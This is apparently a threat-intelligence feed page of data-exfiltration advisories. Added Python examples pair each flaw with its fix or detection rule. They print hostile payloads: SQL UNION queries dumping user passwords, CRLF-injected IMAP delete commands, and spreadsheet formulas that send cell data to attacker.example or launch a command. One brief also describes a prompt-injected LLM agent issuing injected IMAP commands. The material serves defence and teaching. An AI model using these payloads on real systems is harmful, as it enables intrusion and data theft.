Threat Feed

Tag

Data Exfiltration

42 briefs
high advisory

JupyterLab-Git excluded_paths Case-Sensitivity Bypass (CVE-2026-54528)

An authenticated user can bypass the admin-configured `excluded_paths` security control in `jupyterlab-git` versions up to 0.53.0 by exploiting a case-sensitivity flaw on case-insensitive filesystems (e.g., macOS APFS, Windows NTFS), allowing unauthorized read access to git history and file content in explicitly excluded directories.

jupyterlab-git <= 0.53.0 web-vulnerability path-traversal data-exfiltration jupyterlab python
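To make the flaw in the brief above concrete, here is an added Python example (not jupyterlab-git's own code) of the two checks side by side: `is_excluded_naive` compares the requested path with the admin's `excluded_paths` byte for byte, which is exactly what a case-insensitive APFS or NTFS volume defeats, while `is_excluded_hardened` normalises `..` segments and case-folds the comparison when the repository sits on such a volume. The exclusion list, the probe helper and the sample paths are constructed for the example.

```python
import os
import tempfile
from pathlib import PurePosixPath

# Hypothetical admin-configured excluded_paths, relative to the repository root.
EXCLUDED_PATHS = ["secrets", "private/keys"]


def fs_is_case_insensitive(directory="."):
    """Probe whether `directory` lives on a case-insensitive filesystem.

    Creates a temporary file with a mixed-case name and checks whether the
    same name with its case swapped resolves to an existing file.
    """
    with tempfile.NamedTemporaryFile(prefix="CaseProbe", dir=directory) as probe:
        name = os.path.basename(probe.name)
        return os.path.exists(os.path.join(directory, name.swapcase()))


def _under(path, prefix):
    """True if `path` equals `prefix` or lies below it (purely lexical)."""
    p, q = PurePosixPath(path), PurePosixPath(prefix)
    return p == q or q in p.parents


def is_excluded_naive(path, excluded=EXCLUDED_PATHS):
    """Byte-for-byte comparison: 'SECRETS/id_rsa' slips past 'secrets'."""
    return any(_under(path, e) for e in excluded)


def is_excluded_hardened(path, excluded=EXCLUDED_PATHS, case_insensitive_fs=None):
    """Normalise '..' segments and, on a case-insensitive filesystem, compare
    case-folded so the exclusion covers every spelling the OS resolves to the
    same directory. Pass `case_insensitive_fs` explicitly to skip the probe."""
    if case_insensitive_fs is None:
        case_insensitive_fs = fs_is_case_insensitive(".")

    def norm(p):
        p = os.path.normpath(p).replace(os.sep, "/")
        return p.casefold() if case_insensitive_fs else p

    candidate = norm(path)
    return any(_under(candidate, norm(e)) for e in excluded)


if __name__ == "__main__":
    for req in ("secrets/id_rsa", "SECRETS/id_rsa", "Private/KEYS/../keys/x", "secretsfile"):
        print(f"{req:26} naive={is_excluded_naive(req)!s:5} "
              f"hardened(ci)={is_excluded_hardened(req, case_insensitive_fs=True)}")
```

When in doubt about the volume, folding case unconditionally only over-excludes, which is the safe failure mode for a deny-list.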
high advisory

Arbitrary Host File Read via Symlink Following in containerd CRI Checkpoint Restore (CVE-2026-53489)

A high-severity vulnerability (CVE-2026-53489) in containerd's CRI plugin allows an unprivileged attacker to read arbitrary files on the host system by crafting a malicious checkpoint with a symlink that `containerd` follows during `container.log` restoration, enabling data exfiltration via `kubectl logs`.

containerd v2.1.0-2.1.8 +2 container kubernetes vulnerability data-exfiltration linux
high advisory

Joomla! Component Flip Wall SQL Injection (CVE-2017-20265)

An SQL injection vulnerability, CVE-2017-20265, in Joomla! Component Flip Wall 8.0 allows unauthenticated attackers to execute arbitrary SQL queries via malicious GET requests to the `wallid` parameter, enabling the extraction of sensitive database information.

Flip Wall 8.0 sql-injection web-vulnerability joomla cve data-exfiltration
high advisory

Joomla! FocalPoint Pro/Free SQL Injection (CVE-2017-20263)

An unauthenticated SQL injection vulnerability (CVE-2017-20263) in Joomla! Component FocalPoint Pro/Free version 1.2.3 allows attackers to execute arbitrary SQL queries via a crafted 'id' parameter in GET requests, leading to sensitive database information disclosure.

FocalPoint Pro/Free sqli web-vulnerability joomla data-exfiltration
high advisory

CVE-2017-20261: Joomla! Bargain Product VM3 SQL Injection Vulnerability

An unauthenticated attacker can exploit CVE-2017-20261, an SQL injection vulnerability in Joomla! Component Bargain Product VM3 1.0, by injecting SQL into the 'product_id' parameter of GET requests to the 'brainy' or 'alice' views, allowing them to execute arbitrary SQL queries and extract sensitive database information.

Bargain Product VM3 1.0 sql-injection joomla web-application cve data-exfiltration
high advisory

Joomla! Component RPC Responsive Portfolio 1.6.1 SQL Injection (CVE-2017-20258)

Unauthenticated attackers can exploit an SQL injection vulnerability (CVE-2017-20258) in Joomla! Component RPC Responsive Portfolio 1.6.1 by injecting malicious code through the 'id' parameter in GET requests, allowing the execution of arbitrary SQL queries and extraction of sensitive database information.

RPC Responsive Portfolio 1.6.1 sql-injection web-vulnerability joomla cve data-exfiltration
high advisory

CVE-2017-20257: Joomla! Component Quiz Deluxe SQL Injection

An unauthenticated SQL injection vulnerability (CVE-2017-20257) in Joomla! Component Quiz Deluxe 3.7.4 allows attackers to execute arbitrary SQL commands and extract sensitive information via the `ajaxaction.flag_question` task using `stu_quiz_id` or `flag_quest` parameters.

Quiz Deluxe 3.7.4 sql-injection web-application joomla cve data-exfiltration
high advisory

CVE-2017-20252: Joomla NextGen Editor SQL Injection

Joomla NextGen Editor 2.1.0 contains an SQL injection vulnerability (CVE-2017-20252) that allows unauthenticated attackers to execute arbitrary SQL commands through the `plname` parameter in crafted GET requests to `index.php?option=com_nge&view=config`, leading to the extraction of sensitive database information.

NextGen Editor 2.1.0 sqli web-vulnerability joomla cve data-exfiltration
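The six Joomla! component briefs above (Flip Wall, FocalPoint, Bargain Product VM3, RPC Responsive Portfolio, Quiz Deluxe, NextGen Editor) share one root cause: a GET parameter is pasted into SQL text. The following Python example, added here and not taken from any of those components, reproduces the pattern against an in-memory SQLite database in both a numeric context (`id`, `product_id`, `wallid`) and a quoted-string context (`plname`), shows a UNION payload pulling a credential row out of an unrelated table, and contrasts it with the bound-parameter version. The schema, rows and hash value are constructed.

```python
import sqlite3

# Constructed schema standing in for a component's tables; the real components'
# table and column names are not reproduced here.
SCHEMA = """
CREATE TABLE portfolio (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO portfolio VALUES (1, 'Landing page', 1), (2, 'Brochure', 1);
INSERT INTO users VALUES (42, 'admin', '$2y$10$constructed.hash.value');
"""

# Payloads of the kind an unauthenticated request would carry in the parameter.
UNION_NUMERIC = "0 UNION SELECT username, password FROM users"
UNION_STRING = "x' UNION SELECT username, password FROM users -- "


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def item_by_id_vulnerable(conn, id_param):
    """The affected pattern: the GET parameter becomes part of the SQL text."""
    sql = "SELECT id, title FROM portfolio WHERE published = 1 AND id = " + id_param
    return conn.execute(sql).fetchall()


def item_by_name_vulnerable(conn, name_param):
    """Same flaw inside a quoted string; the payload closes the quote and
    comments out the rest of the statement."""
    sql = "SELECT id, title FROM portfolio WHERE title = '" + name_param + "'"
    return conn.execute(sql).fetchall()


def item_by_id_fixed(conn, id_param):
    """Validate the type, then bind: the value can never become SQL syntax."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, title FROM portfolio WHERE published = 1 AND id = ?",
        (int(id_param),),
    ).fetchall()


def item_by_name_fixed(conn, name_param):
    """A bound string parameter is data, whatever quotes it contains."""
    return conn.execute(
        "SELECT id, title FROM portfolio WHERE title = ?", (name_param,)
    ).fetchall()


if __name__ == "__main__":
    conn = connect()
    print("vulnerable (numeric):", item_by_id_vulnerable(conn, UNION_NUMERIC))
    print("vulnerable (string): ", item_by_name_vulnerable(conn, UNION_STRING))
    print("fixed (numeric):     ", item_by_id_fixed(conn, "1"))
    print("fixed (string):      ", item_by_name_fixed(conn, UNION_STRING))
```

The UNION needs the same column count as the original SELECT, which is why the payloads pick two columns; a tester who does not know the count walks it up with `ORDER BY n` or by adding columns until the error goes away.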
critical threat

FortiBleed Campaign: 73,932 FortiGate Systems Credentials Exposed

A Russian-speaking threat group utilized a large dataset of administrative and VPN credentials, likely sourced from exposed FortiGate configuration files and active credential harvesting, to access government, critical infrastructure, and multinational corporate networks, resulting in widespread data exfiltration.

FortiGate +1 Russian-speaking threat group credential-theft fortios state-sponsored espionage data-exfiltration russian-speaking critical-infrastructure government
high advisory

Tilt: Unauthenticated pprof debug endpoints on the Tilt HUD server

An unauthenticated attacker can exploit CVE-2026-55882 in Tilt HUD server versions 0.19.5 through 0.37.3, when exposed on a non-loopback address, by accessing the `/debug/pprof` endpoints to read sensitive process memory, including session and API server tokens, and to degrade application performance through prolonged CPU profiling or tracing.

Tilt HUD server vulnerability information-disclosure denial-of-service data-exfiltration golang webserver
high advisory

PraisonAI: IMAP Command Injection via Unsanitized Email Search Parameters

A command injection vulnerability (no CVE assigned) exists in PraisonAI's `praisonaiagents` package (versions <= 1.6.48): LLM-controlled parameters are interpolated unsanitised into IMAP SEARCH commands, so an attacker who controls the prompt can inject arbitrary IMAP commands, leading to unauthorized email exfiltration, deletion, or denial of service when email tools are configured.

praisonaiagents command-injection llm-agent imap email data-exfiltration
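An added Python example (not PraisonAI's code) of the interpolation flaw described above and of the fix a practitioner would apply: `build_search_vulnerable` formats model-chosen values straight into the SEARCH criteria, so a value containing a quote or a CRLF rewrites the command; `imap_quote` renders each value as an RFC 3501 quoted string (backslash and double quote escaped, CR/LF/NUL and non-ASCII refused) and `build_search_hardened` only assembles criteria from an allow-list of keys. The payload strings are constructed; what they achieve depends on the client sending the criteria verbatim, which is what the brief describes.

```python
# Characters that can never appear inside an IMAP quoted string.
_CTL = {"\r", "\n", "\0"}

# Constructed payloads a prompt-injected model might pass as a "sender" value.
CRLF_PAYLOAD = 'a@example.com"\r\nA2 STORE 1:* +FLAGS (\\Deleted)\r\nA3 SEARCH FROM "'
QUOTE_PAYLOAD = 'x" OR ALL "'   # turns a narrow search into "match every message"


def build_search_vulnerable(sender, subject):
    """The flawed pattern: tool parameters land in the command text unchanged."""
    return f'FROM "{sender}" SUBJECT "{subject}"'


def imap_quote(value):
    """Render `value` as an RFC 3501 quoted string.

    Quoted strings are 7-bit and may not contain CR, LF or NUL; backslash and
    double quote are escaped with a backslash. Anything else would need an
    IMAP literal ({n}CRLF...), which this helper deliberately does not emit so
    that no caller can reintroduce a CRLF through it.
    """
    if not isinstance(value, str):
        raise TypeError("search value must be a str")
    if any(c in _CTL for c in value):
        raise ValueError("CR, LF and NUL are not allowed in a search value")
    if not value.isascii():
        raise ValueError("non-ASCII values need an IMAP literal with CHARSET UTF-8")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_search_hardened(sender=None, subject=None, unseen=False):
    """Assemble SEARCH criteria from fixed keys; every untrusted value is quoted."""
    parts = []
    if unseen:
        parts.append("UNSEEN")
    if sender is not None:
        parts.append(f"FROM {imap_quote(sender)}")
    if subject is not None:
        parts.append(f"SUBJECT {imap_quote(subject)}")
    if not parts:
        raise ValueError("at least one search criterion is required")
    return " ".join(parts)


if __name__ == "__main__":
    print(repr(build_search_vulnerable(CRLF_PAYLOAD, "invoice")))
    print(repr(build_search_vulnerable(QUOTE_PAYLOAD, "invoice")))
    print(repr(build_search_hardened(sender=QUOTE_PAYLOAD, subject="invoice")))
    try:
        build_search_hardened(sender=CRLF_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

Note that the hardened builder fixes the protocol layer only: the model can still ask for a broad but well-formed search, so the mailbox and the verbs the tool may use (search and read, never STORE or EXPUNGE) still need to be constrained at the tool definition.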
high threat

Multiple Vulnerabilities in Typo3 Leading to RCE, Privilege Escalation, and Data Compromise

Multiple vulnerabilities discovered in Typo3 allow an attacker to achieve remote arbitrary code execution, privilege escalation, data confidentiality and integrity compromise, security policy bypass, cross-site scripting (XSS), and SQL injection (SQLi).

exploited Typo3 < 10.4.57 +4 web-vulnerability rce privilege-escalation data-exfiltration typo3 cert-fr
high advisory

Multiple Xen Hypervisor Vulnerabilities Leading to Privilege Escalation, DoS, and Data Confidentiality Compromise

Multiple vulnerabilities, including CVE-2025-10263, CVE-2026-42487, CVE-2026-42488, CVE-2026-42489, and CVE-2026-42490, have been discovered in Xen, allowing an attacker to achieve privilege escalation, trigger a remote denial of service, and compromise data confidentiality on vulnerable hypervisor instances.

Xen virtualization hypervisor vulnerability privilege-escalation denial-of-service data-exfiltration
critical advisory

Multiple Critical Vulnerabilities in Fortinet Products Lead to RCE and Data Exposure

Multiple critical vulnerabilities (CVE-2025-67862, CVE-2026-25089, CVE-2026-49938) have been discovered across Fortinet products including FortiOS, FortiPortal, FortiProxy, and FortiSandbox, enabling unauthenticated attackers to achieve remote arbitrary code execution and compromise data confidentiality.

FortiOS +11 remote-code-execution data-exfiltration vulnerability fortinet network-appliance
critical advisory

Vulnerability in Veeam Backup & Replication Allowing Remote Code Execution (CVE-2026-44963)

A critical remote code execution vulnerability, tracked as CVE-2026-44963, has been discovered in Veeam Backup & Replication versions prior to 12.3.2.4854, which could allow an unauthenticated attacker to execute arbitrary code on affected systems, leading to full compromise of the backup infrastructure and potential data exfiltration or destruction.

Veeam Backup & Replication < 12.3.2.4854 remote-code-execution vulnerability veeam backup-replication data-exfiltration data-destruction windows
critical advisory

Atomic Arch Campaign Leverages Orphaned AUR Packages for Linux Payload Deployment

The Atomic Arch campaign compromises orphaned Arch User Repository (AUR) packages, modifying their PKGBUILDs to install malicious npm/Bun dependencies like 'atomic-lockfile,' which deploy a Linux payload with credential harvesting, eBPF-based stealth, anti-debugging, and data exfiltration capabilities, impacting approximately 1,500 packages.

Arch User Repository +2 supply-chain-attack npm bun linux malware credential-harvesting eBPF rootkit +1
high advisory

PraisonAI Arbitrary File Write Vulnerability

PraisonAI versions 4.6.37 and earlier are vulnerable to arbitrary file write due to missing path validation in the `write_file` function when `workspace=None`, allowing an attacker to write attacker-controlled content to arbitrary file paths on the victim's system via a malicious webpage.

PraisonAI <= 4.6.37 arbitrary file write web crawling data exfiltration
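The PraisonAI arbitrary file write above and the containerd checkpoint symlink issue (CVE-2026-53489, earlier in this feed) are two faces of one missing check: a path under attacker influence is used without confirming that it still lies inside the directory it is supposed to be confined to once symlinks and `..` are resolved. The Python below is an added example, not code from either project. `confine` is the shared check, `read_restored_log` applies it to a restored `container.log` (refusing a symlink outright, via lstat), and `write_file` applies it to a workspace-relative write and refuses to write at all when there is no workspace. `demo` builds the attacker's layout in a temporary directory; all names and contents are constructed.

```python
import tempfile
from pathlib import Path


def confine(root, candidate):
    """Resolve `candidate` against `root` and return it only if the resolved
    path (symlinks followed) still lies inside the resolved root."""
    root_real = Path(root).resolve(strict=True)
    # An absolute `candidate` replaces root_real in the join, so it is caught below.
    target = (root_real / candidate).resolve()
    try:
        target.relative_to(root_real)
    except ValueError:
        raise ValueError(f"{candidate!r} resolves outside {root_real}") from None
    return target


def read_restored_log(checkpoint_dir, name="container.log"):
    """Open a restored log only if it is a regular path inside the checkpoint:
    check with lstat semantics (is_symlink) rather than following the link."""
    path = Path(checkpoint_dir) / name
    if path.is_symlink():
        raise ValueError(f"{name} in the checkpoint is a symlink; not following it")
    return confine(checkpoint_dir, name).read_text()


def write_file(workspace, relpath, content):
    """Workspace-confined write: no workspace means no write, not 'anywhere'."""
    if workspace is None:
        raise ValueError("refusing to write without a workspace root")
    target = confine(workspace, relpath)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(content)
    return target


def _rejected(fn, *args):
    try:
        fn(*args)
    except ValueError:
        return True
    return False


def demo():
    """Lay out an attacker-controlled checkpoint and workspace, exercise both checks."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        host_secret = tmp / "host_secret"            # stands in for a host file such as /etc/shadow
        host_secret.write_text("root:x:0:0:root:/root:/bin/sh\n")

        ckpt = tmp / "checkpoint"
        ckpt.mkdir()
        (ckpt / "container.log").symlink_to(host_secret)   # attacker-planted link in the checkpoint
        results["naive_leak"] = (ckpt / "container.log").read_text()   # what a plain open() hands back
        results["log_rejected"] = _rejected(read_restored_log, ckpt)

        ws = tmp / "workspace"
        ws.mkdir()
        (ws / "link").symlink_to(tmp)                # a symlinked directory that escapes the workspace
        results["written"] = write_file(ws, "notes/a.txt", "hello").read_text()
        results["no_workspace"] = _rejected(write_file, None, "x.txt", "pwned")
        results["dotdot"] = _rejected(write_file, ws, "../escape.txt", "pwned")
        results["symlink_dir"] = _rejected(write_file, ws, "link/x.txt", "pwned")
        results["absolute"] = _rejected(write_file, ws, str(host_secret), "pwned")
        results["secret_intact"] = host_secret.read_text().startswith("root:")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:14} {value!r}")
```

Resolving both the root and the candidate before comparing is what makes the check hold on systems where the root itself sits behind a symlink (macOS `/var` to `/private/var`, for instance); comparing prefixes of unresolved strings is the classic way this check is got wrong.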
high threat

Storm-2949 Abuses SSPR for Cloud-Wide Data Exfiltration

Storm-2949 compromised cloud identities through social engineering and abused the Self-Service Password Reset (SSPR) process to bypass MFA and gain persistent access, enabling lateral movement and data exfiltration from Microsoft 365 and Azure environments.

Microsoft Entra ID +3 Storm-2949 cloud-security credential-access data-exfiltration social-engineering
high threat

CVE-2026-8851: SOGo SQL Injection Vulnerability in ACL Management

SOGo 5.12.7 is vulnerable to SQL injection in the Access Control List management functionality, allowing authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint, which can be exfiltrated via the /acls API.

SOGo 5.12.7 sql-injection cve-2026-8851 data-exfiltration
high threat

UNC6671 BlackFile Vishing Extortion Campaign Targeting Microsoft 365 and Okta

UNC6671, operating under the "BlackFile" brand, conducts a sophisticated extortion campaign targeting organizations through voice phishing (vishing) and single sign-on (SSO) compromise, using adversary-in-the-middle (AiTM) techniques to bypass MFA and exfiltrate sensitive corporate data.

Microsoft 365 +5 UNC6671 vishing extortion aitm credential-theft data-exfiltration sso
high advisory

CVE-2026-4029: Database Backup for WordPress Plugin Unauthorized Database Export

The Database Backup for WordPress plugin up to version 2.5.2 is vulnerable to unauthorized database export due to improper authorization enforcement, allowing unauthenticated attackers to export database tables in WordPress Multisite environments.

Database Backup for WordPress plugin <= 2.5.2 cve wordpress database backup unauthenticated access data exfiltration
critical advisory

Vulnerabilities in Unitree Embodied AI Systems

Commercially available Unitree robots are susceptible to multiple vulnerabilities, including hardcoded keys and command injection, allowing attackers to gain root-level access, exfiltrate data, and potentially create physical botnets.

Go1 +8 embodied-ai robot iot vulnerability data-exfiltration
medium advisory

Potential Data Exfiltration via Rclone

Attackers are abusing the legitimate file synchronization tool rclone, often renamed to masquerade as legitimate software, to exfiltrate data to cloud storage or remote endpoints.

Elastic Defend data-exfiltration rclone masquerading
high threat

Social Engineering Attacks Targeting Enterprise SaaS Environments

Financially motivated threat actors are using social engineering techniques like vishing and credential harvesting to compromise enterprise SaaS environments, leading to data exfiltration and extortion.

ShinyHunters social-engineering saas data-exfiltration extortion
high threat

Trigona Ransomware Employing Custom Data Exfiltration Tool

Trigona ransomware is using a custom data exfiltration tool named 'uploader_client.exe' to steal data from compromised environments, enhancing speed and evasion.

Windows +3 Trigona ransomware data exfiltration custom tool
low advisory

Unusual Spike in Bytes Written to External Device Detected by Machine Learning

A machine learning job has detected a spike in bytes written to an external device, which is anomalous and can signal illicit data copying or transfer activities, potentially leading to data exfiltration.

data exfiltration machine learning external device
high advisory

CrowdStrike Falcon AIDR Supports NVIDIA NeMo Guardrails for AI Agent Protection

CrowdStrike Falcon AIDR now supports NVIDIA NeMo Guardrails, providing enterprise-grade protection for AI agents by defending against runtime attacks like prompt injection, redacting sensitive data, defanging malicious content, and moderating unwanted topics to ensure agents stay within compliance boundaries in sectors like finance, healthcare, customer service, and software development.

ai-security prompt-injection data-exfiltration
high advisory

Speagle Malware Hijacks Cobra DocGuard for Data Exfiltration

The Speagle malware hijacks the Cobra DocGuard application to exfiltrate sensitive data from infected machines to attacker-controlled Cobra DocGuard servers, effectively masking malicious traffic as legitimate DocGuard communication.

malware data-exfiltration cobra-docguard speagle
critical advisory

Apache Artemis and ActiveMQ Artemis Authentication Bypass Vulnerability

CVE-2026-27446 allows an unauthenticated remote attacker to inject malicious messages or exfiltrate data from Apache Artemis and ActiveMQ Artemis brokers due to a missing authentication check in the Core protocol.

apache-artemis apache-activemq authentication-bypass message-injection data-exfiltration
low advisory

Potential Data Exfiltration to Unusual Geographic Region via Machine Learning

A machine learning job has detected potential data exfiltration to an unusual geographic region, keyed on the destination's region name, which can indicate exfiltration over a command and control channel.

data-exfiltration machine-learning network-traffic
low advisory

Unusual Remote File Size Indicating Lateral Movement

A machine learning job has detected an unusually high file size shared by a remote host, indicating potential lateral movement as attackers bundle data into a single large file transfer to evade detection when exfiltrating valuable information.

lateral-movement data-exfiltration machine-learning
low advisory

Spike in Bytes Sent to an External Device via Airdrop

A machine learning job has detected a spike in bytes of data written to an external device via Airdrop, potentially indicating illicit data copying or transfer activities.

data-exfiltration macos airdrop
low advisory

Machine Learning Detects High Bytes Written to External Device

A machine learning job has detected high bytes of data written to an external device, potentially indicating illicit data copying or transfer activities leading to data exfiltration over a physical medium such as USB.

data-exfiltration machine-learning endpoint
high advisory

wger CSV/TSV Formula Injection Vulnerability

A CSV/TSV injection vulnerability exists in wger <= 2.5, allowing malicious gym members to inject spreadsheet formulas into their profiles, which are then executed when an administrator exports and opens the member list, potentially leading to data exfiltration and remote code execution.

wger csv-injection formula-injection web-application data-exfiltration
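An added Python example (not wger's code) of the export-side fix for the formula injection described above, and of an audit you can run over an exported file. A cell that begins with `=`, `+`, `-`, `@` (or a tab or carriage return some spreadsheet applications skip before looking) is evaluated when the file is opened, so the common mitigation is to prefix such cells with a single quote, which forces the spreadsheet to store them as text; proper CSV quoting then takes care of embedded quotes and separators. The member rows and payloads are constructed.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate the cell as a formula.
# Tab and CR are included because some applications skip them before deciding.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed member profiles, not data from any wger instance.
SAMPLE_MEMBERS = [
    {"username": "alice", "email": "alice@example.org", "notes": "prefers mornings"},
    # HYPERLINK-style payload that ships neighbouring cells to a third party on click
    {"username": "mallory", "email": "m@example.org",
     "notes": '=HYPERLINK("http://attacker.example/?"&A2&B2,"open")'},
    # DDE-style payload in one field, tab-prefixed formula in another
    {"username": "-2+3+cmd|' /C calc'!A0", "email": "x@example.org", "notes": "\t=1+1"},
]


def is_formula_like(value):
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Prefix a formula-looking string with a single quote so the spreadsheet
    stores it as text. Non-strings (numbers, None) are returned unchanged."""
    if is_formula_like(value):
        return "'" + value
    return value


def export_members(rows, fieldnames=("username", "email", "notes"), neutralize=True):
    """Render the member list as CSV; `neutralize=False` reproduces the flaw."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=list(fieldnames),
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {k: row.get(k, "") for k in fieldnames}
        if neutralize:
            cells = {k: neutralize_cell(v) for k, v in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def formula_cells(csv_text):
    """Audit an export: (row, column, value) for every cell a spreadsheet would evaluate."""
    reader = csv.reader(io.StringIO(csv_text))
    return [(r, c, v) for r, row in enumerate(reader)
            for c, v in enumerate(row) if is_formula_like(v)]


if __name__ == "__main__":
    print("unsafe export flags:", formula_cells(export_members(SAMPLE_MEMBERS, neutralize=False)))
    print(export_members(SAMPLE_MEMBERS))
```

The prefix approach trades a visible apostrophe in legitimately formula-shaped data (phone numbers written as `+49 ...`) for safety on the administrator's machine; the alternative of rejecting such input at profile-save time is stricter but breaks those legitimate values.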
medium advisory

OneDrive Share Mounted via Net Utility for Potential Data Exfiltration

Adversaries may mount OneDrive shares as network drives using net.exe or net1.exe to stage, access, or exfiltrate data through cloud-hosted WebDAV paths, potentially bypassing traditional file share monitoring.

OneDrive +3 data-exfiltration net.exe
medium advisory

Detection of Azure Storage Utility Execution via Command Line Interface

Adversaries may leverage Azure Storage utilities like AzCopy and Storage Explorer post-compromise to stage or extract sensitive data from endpoints, blending malicious activity with legitimate cloud traffic.

AzCopy.exe +1 data-exfiltration azure-storage cli windows
high advisory

Detection of Attacker Tools on Endpoints

This analytic detects the execution of attacker tools used for unauthorized access, network scanning, privilege escalation, password dumping, or data exfiltration, based on process activity data from EDR agents and focusing on known attacker tool names.

Splunk Enterprise +3 attacker-tool endpoint privilege-escalation data-exfiltration
critical advisory

Axios Prototype Pollution Vulnerability Leads to Request Hijacking and Data Exfiltration

Axios versions 0.19.0 through 1.13.6 are vulnerable to prototype pollution, allowing attackers to intercept and modify JSON responses, hijack HTTP requests, and exfiltrate sensitive data by polluting the Object.prototype with keys like `parseReviver` and `transport`.

axios +1 prototype-pollution request-hijacking data-exfiltration javascript
low advisory

Unusual Process Writing Data to an External Device via Machine Learning

A machine learning job detects a rare process writing data to an external device, potentially indicating data exfiltration masked by benign-looking processes.

data-exfiltration machine-learning elastic-defend
medium advisory

Mounting of Hidden or WebDav Remote Shares via Net Utility

Adversaries may leverage the `net.exe` utility to mount WebDav or hidden remote shares, potentially indicating lateral movement, data exfiltration preparation, or initial access via discovery of accessible shares.

Elastic Defend +2 lateral-movement data-exfiltration windows
medium advisory

Microsoft Devtunnels Image Load Detection

This detection identifies potential misuse of Microsoft Devtunnels within Visual Studio by detecting image load events, indicating that an attacker could expose a compromised system or service to the internet for covert communication and data exfiltration.

Visual Studio +3 devtunnels reverse-proxy command-and-control data-exfiltration windows
medium advisory

Large ICMP Traffic Detection

This analytic identifies excessive ICMP traffic to external IP addresses exceeding 1,000 bytes, potentially indicating command and control activity, data exfiltration, or covert communication channels.

Splunk Enterprise +4 network-traffic command-and-control data-exfiltration
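Three of the detection briefs in this feed (rclone masquerading, WebDAV or hidden-share mounts via `net.exe`, and the large-ICMP analytic above) reduce to simple predicates over endpoint and network telemetry. The Python below is an added example, written for this page rather than taken from Elastic or Splunk content, that runs one rule per brief over a handful of constructed events in a flattened, ECS-like shape; the field names, hostnames, paths and byte counts are assumptions. The rclone rule fires on a binary whose PE original file name is still `rclone.exe` while the process name is not, or on a command line with rclone's verb plus `remote:path` shape; the net rule fires on `use` with an `@SSL`/`DavWWWRoot`/`http(s)` target or a share ending in `$`; the ICMP rule fires on more than 1,000 bytes to an address outside the listed internal ranges.

```python
import ipaddress
import re

# Constructed telemetry records; field names and values are assumptions for the example.
EVENTS = [
    {"kind": "process", "host": "ws01", "process.name": "svchost.exe",
     "pe.original_file_name": "rclone.exe",
     "process.args": ["svchost.exe", "copy", "C:\\Finance", "mega:dump", "--no-check-certificate"]},
    {"kind": "process", "host": "ws02", "process.name": "rclone.exe",
     "pe.original_file_name": "rclone.exe", "process.args": ["rclone.exe", "version"]},
    {"kind": "process", "host": "ws03", "process.name": "net.exe", "pe.original_file_name": "net.exe",
     "process.args": ["net", "use", "Z:", "\\\\tenant-my.sharepoint.com@SSL\\DavWWWRoot\\personal\\u"]},
    {"kind": "process", "host": "ws03", "process.name": "net1.exe", "pe.original_file_name": "net1.exe",
     "process.args": ["net1", "use", "Y:", "\\\\fileserver\\C$"]},
    {"kind": "process", "host": "ws04", "process.name": "net.exe", "pe.original_file_name": "net.exe",
     "process.args": ["net", "use", "P:", "\\\\fileserver\\public"]},
    {"kind": "network", "host": "ws05", "network.transport": "icmp",
     "destination.ip": "203.0.113.7", "network.bytes": 4200},
    {"kind": "network", "host": "ws05", "network.transport": "icmp",
     "destination.ip": "10.0.0.1", "network.bytes": 9000},
    {"kind": "network", "host": "ws06", "network.transport": "icmp",
     "destination.ip": "198.51.100.9", "network.bytes": 64},
]

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "lsjson"}
REMOTE_ARG = re.compile(r"[A-Za-z0-9_-]{2,}:.*")   # 'remote:path'; two+ chars rules out 'C:\'
# Explicit internal ranges rather than ipaddress.is_private, which also covers
# documentation ranges and varies between Python versions.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def rule_rclone_masquerade(ev):
    """rclone renamed to look like something else."""
    if ev["kind"] != "process":
        return None
    name = ev["process.name"].lower()
    orig = (ev.get("pe.original_file_name") or "").lower()
    args = [a.lower() for a in ev.get("process.args", [])]
    renamed = orig == "rclone.exe" and name != "rclone.exe"
    shaped = (name != "rclone.exe" and bool(RCLONE_VERBS & set(args))
              and any(REMOTE_ARG.fullmatch(a) for a in args))
    return "rclone_masquerade" if renamed or shaped else None


def rule_net_share_mount(ev):
    """net.exe / net1.exe mounting a WebDAV path or a hidden ($) share."""
    if ev["kind"] != "process" or ev["process.name"].lower() not in {"net.exe", "net1.exe"}:
        return None
    args = ev.get("process.args", [])
    if "use" not in [a.lower() for a in args]:
        return None
    for a in args:
        low = a.lower()
        if "@ssl" in low or "davwwwroot" in low or low.startswith(("http://", "https://")):
            return "net_share_mount"
        if a.startswith("\\\\") and a.rstrip("\\").endswith("$"):
            return "net_share_mount"
    return None


def rule_large_icmp(ev, threshold=1000):
    """ICMP to a non-internal destination carrying more than `threshold` bytes."""
    if ev["kind"] != "network" or ev.get("network.transport") != "icmp":
        return None
    ip = ipaddress.ip_address(ev["destination.ip"])
    if any(ip in net for net in INTERNAL):
        return None
    return "large_icmp" if ev.get("network.bytes", 0) > threshold else None


RULES = (rule_rclone_masquerade, rule_net_share_mount, rule_large_icmp)


def run_rules(events, rules=RULES):
    """Apply every rule to every event; return one hit record per match."""
    hits = []
    for ev in events:
        for rule in rules:
            verdict = rule(ev)
            if verdict:
                hits.append({"host": ev["host"], "rule": verdict, "event": ev})
    return hits


if __name__ == "__main__":
    for h in run_rules(EVENTS):
        print(f"{h['host']:5} {h['rule']}")
```

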